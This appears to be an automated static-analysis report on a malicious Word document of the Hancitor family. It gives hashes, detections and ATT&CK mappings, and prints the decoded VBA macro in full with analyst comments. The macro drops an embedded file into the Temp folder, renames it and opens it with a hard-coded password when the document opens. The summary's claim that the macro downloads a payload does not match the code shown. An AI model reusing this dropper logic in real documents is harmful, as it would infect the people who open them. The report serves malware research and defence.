Hancitor — Office (OLE) malware analysis

Static analysis result for SHA-256 1835e00015a72e81…

Verdict: MALICIOUS
File type: Office (OLE)
Size: 534.5 KB
Created: 2021-10-19 14:09:00
Authoring application: Microsoft Office Word
First seen: 2021-11-02
MD5: 1d6dfb73231da40c6d151d2e8680fb47
SHA-1: 9193f24d93861a24cdf7ff2772b3105b368102ac
SHA-256: 1835e00015a72e819616c01893e9b4d6c8cc7b99bcb6dd4fb4e68ab3a9e3c091
Risk score: 132

Malware Insights

Hancitor · confidence 95%

MITRE ATT&CK
  • T1059.005 Visual Basic
  • T1566.001 Spearphishing Attachment

The sample is a malicious Office document containing a VBA macro that executes a Document_Open subroutine. This subroutine attempts to download and execute a second-stage payload, likely a DLL, by constructing a path to 'zo.dll' and opening it with a password. The ClamAV detection and the presence of a Document_Open macro strongly suggest the Hancitor family, which is known for macro-based downloaders.

Heuristics (6)

  • Office EPRINT stream contains EMF object (severity: high, CVE related, rule OLE_EPRINT_EMF_OBJECT)
    OLE ObjectPool contains an EPRINT stream with EMF data. This is rare in normal documents and is relevant Office object-delivery evidence when paired with exploit payload anomalies, but the malformed graphics record required for exact CVE attribution is not proven by this rule alone.
  • ClamAV: Doc.Downloader.Hancitor10210-9903725-0 (severity: critical, rule CLAMAV_DETECTION)
    ClamAV detected this file as malware: Doc.Downloader.Hancitor10210-9903725-0
  • VBA macros detected (severity: medium, 1 related finding, rule OLE_VBA_MACROS)
    Document contains VBA macro code.
  • Document_Open macro (severity: low, rule OLE_VBA_DOCOPEN)
    Document_Open macro; matched line in script:
    Private Sub Document_Open()
  • Suspicious extracted artifact (severity: info, rule EXTRACTED_FILE_STATIC_TRIAGE)
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Embedded URL (severity: info, rule EMBEDDED_URL)
    One or more URLs were extracted from the document. The URL itself is not a detection; the per-URL labels state which channel (macro, JS, link annotation, document body, ...) reached each URL. The four URLs below are the XML namespace URIs of the Office encryption and password key-encryptor schema, which is consistent with the macro opening the dropped payload as a password-protected document.
    • http://schemas.microsoft.com/office/2006/encryption (in document text, OLE body)
    • http://schemas.microsoft.com/office/2006/keyEncryptor/password (in document text, OLE body)
    • http://schemas.microsoft.com/office/2006/keyEncryptor/certificate (in document text, OLE body)
    • http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)

Extracted artifacts (3)

Files carved from inside the sample during analysis.

macros.bas
  Kind: vba-macro
  Source: oletools.olevba.extract_macros (decoded VBA source)
  Size: 3628 bytes
  SHA-256: 0f66e8b0976dfa1fe567b1dc29fee8e23ed085308518898b6cdda18441ac4ff8
  Preview script (first 1,000 lines of the extracted script):
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Option Explicit
Option Compare Text

' Analyst notes (the comments were added to the decoded source; they are not part of the sample).
' lds receives the full path of the dropped payload "zoro.kl"; vssfs collects "oc",
' the tail of the ".doc" extension that is assembled piece by piece below.
Dim lds As String
Dim vssfs As String

Private Sub Document_Open()
    Dim dfgdgdg
    Call s1("L")                                              ' Module2: mgf = "L"

    Dim fds, fdsa As String
    fds = "\"
    fdsa = ".d"
    Call s2("ocal/")                                          ' Module2: uhjknb = "ocal/"
    Call ass                                                  ' vssfs = "o"
    Call acc                                                  ' vssfs = "oc"
    Dim kytrewwf As String
    kytrewwf = Options.DefaultFilePath(wdUserTemplatesPath)   ' user templates folder
    fds = kytrewwf & fds
    ' Continue only if "<templates>\zoro.doc" does not exist yet
    If Dir(fds & "zo" & "ro" & fdsa & vssfs) = "" Then
        Dim mySum
        ' ppl -> bvxfcsd -> hdhdd -> Search: locates zoro.kl and stores its path in lds
        mySum = Application.Run("ppl")

        If Len(lds) > 2 Then
            Call nam(lds, kytrewwf)                           ' rename zoro.kl to <templates>\zoro.doc
            Call pppx(fds & "zo" & "r" & "o" & fdsa & vssfs)  ' open zoro.doc with the hard-coded password
        End If
    End If
End Sub

' Setter for lds; not called from any of the decoded modules
Sub plof(kl As String)
    lds = kl
End Sub
Sub ass()
    vssfs = "o"
End Sub
Sub acc()
    vssfs = vssfs & "c"
End Sub

' Recursively searches the folder asda for zoro.kl (Module123345.Search);
' lds is passed ByRef and receives the file's full path
Sub hdhdd(asda As String)
    Dim MyFSO As FileSystemObject
    Dim MyFile As File
    Dim SourceFolder As String
    Dim DestinationFolder As String
    Dim MyFolder As Folder
    Dim MySubFolder As Folder
    Set MyFSO = New Scripting.FileSystemObject

    Call Search(MyFSO.GetFolder(asda), lds)
End Sub

Attribute VB_Name = "Module1"
Dim vcxz

' Opens the renamed payload document, supplying the hard-coded document password
Sub pppx(pili As String)
    Call oicx(pili)
    Documents.Open FileName:=vcxz, ConfirmConversions:=False, ReadOnly:= _
        False, AddToRecentFiles:=False, PasswordDocument:="doyouknowthatthegodsofdeathonlyeatapples?", _
        PasswordTemplate:="", Revert:=False, WritePasswordDocument:="", _
        WritePasswordTemplate:="", Format:=wdOpenFormatAuto, XMLTransform:=""
End Sub

Sub oicx(iii As String)
    vcxz = iii
End Sub

Attribute VB_Name = "Module3"

' tini is "Local/Temp" (assembled in Module2.ppl). Analyst note: the Selection
' moves walk the cursor to the embedded OLE Package object in the document body
' and copy it; copying a Package object makes Word's Package handler write the
' packaged file (zoro.kl) into the user's Temp folder, which the macro then
' searches below %LOCALAPPDATA%\Temp.
Sub bvxfcsd(tini As String)
    Selection.MoveDown Unit:=wdLine, Count:=3
    Selection.MoveRight Unit:=wdCharacter, Count:=2
    Selection.MoveDown Unit:=wdLine, Count:=3
    Selection.MoveRight Unit:=wdCharacter, Count:=2
    Selection.TypeBackspace
    Selection.Copy
    Dim uuuuc
    uuuuc = Options.DefaultFilePath(wdUserTemplatesPath)

    ' Shorten the templates path one character at a time until the prefix plus
    ' "Local/Temp" names an existing directory, i.e. "...\AppData\Local/Temp".
    ' ntgs and sda are undeclared (this module has no Option Explicit); the loop
    ' ends only when such a directory is found, because sda is then set to 61.
    ntgs = 50
    sda = 49
    While sda < 50
        ntgs = ntgs - 1
        If Dir(Left(uuuuc, ntgs) & tini, vbDirectory) = "" Then
        Else
            sda = 61
        End If
    Wend

    Call ThisDocument.hdhdd(Left(uuuuc, ntgs) & tini)
End Sub

Attribute VB_Name = "Module123345"
Dim pls As String

' Recursive search for "zoro.kl" below folder mds. pafs is ByRef, so the
' caller's variable (ThisDocument.lds) receives the matching File object's
' default property, its path. The ErrHandle label is never reached: there is
' no On Error GoTo in this routine.
Sub Search(mds As Object, pafs As String)
    Dim Nedc As Object
    Dim Ters As Object

    For Each Nedc In mds.SubFolders
        Search Nedc, pafs
    Next Nedc

    For Each Ters In mds.Files
        If Ters.Name = "zoro.kl" Then
            pafs = Ters
        End If
    Next Ters
    Exit Sub
ErrHandle:
    Err.Clear
End Sub

' Renames the located payload to "<templates>\zoro.doc"
' (oxl is built as "\zoro.d" & "o" & "c")
Sub nam(pafs As String, aaaa As String)
    Call ousx(aaaa)
    Dim oxl
    oxl = "\zo" & "ro." & "d"
    oxl = oxl & "o"
    oxl = oxl & "c"
    Name pafs As pls & oxl
End Sub

Sub uoia(fffs As String)
    pls = fffs
End Sub

Sub ousx(aaaa As String)
    Call uoia(aaaa)
End Sub

Attribute VB_Name = "Module2"
' Only fafaa is typed as String; VBA applies the As clause to the last name
' only, so the other four are Variant
Dim mgf, uhjknb, wers, qweds, fafaa As String
Dim ocm As String

Sub s1(vi As String)
    mgf = vi
End Sub
Sub s2(vi As String)
    uhjknb = vi
End Sub
' Not called from any of the decoded modules
Sub s3(vi As String)
    wers = vi
End Sub

' Assembles "L" & "ocal/" & "T" & "e" & "m" & "p" = "Local/Temp" and hands it
' to Module3.bvxfcsd
Sub ppl()
    Dim mfd As String
    mfd = "e"
    wers = "T"

    Dim poidds As String
    Dim ugfc As String
    ugfc = "p"
    qweds = "m"

    poidds = mgf & uhjknb & "" & wers & mfd & qweds & ugfc
    Dim lklc As String
    lklc = poidds
    Call bvxfcsd(lklc)
End Sub
ole10native_00.bin
  Kind: ole-package
  Source: OLE Ole10Native stream: ObjectPool/_1696132553/Ole10Native
  Size: 349987 bytes
  SHA-256: 9568e0188f482ae50396bc8caaf09c86bdcb4599d6fa54b07a0a6268a6e9fce6
  Detection
    ClamAV: No threats found
    Obfuscation or payload: likely
    Carved artifact entropy is 7.98, consistent with packed or encrypted content.
ole10native_00_zoro.kl
  Kind: ole-package-payload
  Source: OLE Ole10Native payload: ObjectPool/_1696132553/Ole10Native; display_name=zoro.kl; full_path=C:\Users\kell\AppData\Local\Temp\zoro.kl; temp_path=; def_file=
  Size: 349696 bytes
  SHA-256: dd891db0c9eed71e1f6e2f659a9b7dc18806626480f36b1e84ef18f41cd6a57d
  Detection
    ClamAV: No threats found
    Obfuscation or payload: likely
    Carved artifact entropy is 7.98, consistent with packed or encrypted content.